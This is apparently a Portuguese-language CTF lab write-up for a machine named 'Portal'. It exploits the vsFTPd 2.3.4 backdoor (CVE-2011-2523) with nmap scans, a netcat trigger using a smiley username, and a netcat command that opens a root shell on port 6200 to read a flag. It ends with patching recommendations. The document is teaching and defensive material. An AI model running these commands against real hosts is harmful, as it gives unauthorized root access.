
Um passo a passo detalhado de testes de penetração e um relatório de exploração para a máquina 'Portal', com foco no CVE-2011-2523 (backdoor do vsFTPd 2.3.4) para obter acesso root.
⚠️ Este projeto é apenas para fins educacionais e de testes autorizados.
O acesso não autorizado a sistemas é estritamente proibido.
SYAFIQ
Função: Líder de Testes de Penetração
| Fase | Ferramenta | Descrição |
|---|---|---|
| Descoberta | Nmap | Varre a rede por hosts ativos |
| Enumeração | Nmap | Identifica serviços e versões |
| Análise | Script NSE | Detecta vulnerabilidade conhecida |
| Exploração | Netcat | Aciona a backdoor |
| Pós-Exploração | Terminal | Obtém acesso root e recupera a flag |
Escaneie a rede em busca de hosts ativos:
nmap -sn --unprivileged 10.150.150.10-30
✅ Resultado:
-8 hosts detectados -Alvo identificado: 10.150.150.12
Escaneie portas e serviços abertos:
nmap -Pn -F --unprivileged -sV 10.150.150.12
✅ Descobertas:
-Porta 21 → FTP (vsftpd) -Porta 22 → SSH (OpenSSH 8.2p1)
Verifique se há vulnerabilidade conhecida de backdoor no FTP:
nmap -Pn --unprivileged -p21 --script ftp-vsftpd-backdoor 10.150.150.12
🚨 Resultado:
-Alvo VULNERÁVEL -CVE-2011-2523 confirmada
Acione a backdoor usando um nome de usuário malicioso:
(echo "USER hello:)"; echo "PASS password"; sleep 1) | nc -nv 10.150.150.12 21
⚡ Isso abre um shell root oculto na porta 6200
Conecte-se à backdoor e execute comandos:
(echo "id; cat /root/FLAG1.txt"; sleep 1) | nc -nv 10.150.150.12 6200
Acesso root obtido uid=0(root) confirmado
🏁 Flag Capturada:
5ee499eb5d0b8e4269b13483e57adaa0b3815f48
Sempre atualize serviços desatualizados (vsFTPd estava vulnerável) Serviços mal configurados podem levar ao comprometimento total do sistema Varreduras simples podem revelar vulnerabilidades críticas -🛡️ Recomendações -🔄 Atualize o serviço FTP para a versão mais recente -🚫 Desative serviços desnecessários -🔐 Use firewall para restringir o acesso -📊 Realize auditorias de segurança regularmente -📚 Aviso Legal
Aprender segurança cibernética Praticar hacking ético Realizar testes de penetração autorizados
❌ NÃO use esse conhecimento para atividades ilegais.
“Segurança não é um produto, mas um processo.” — Sempre teste, monitore e melhore.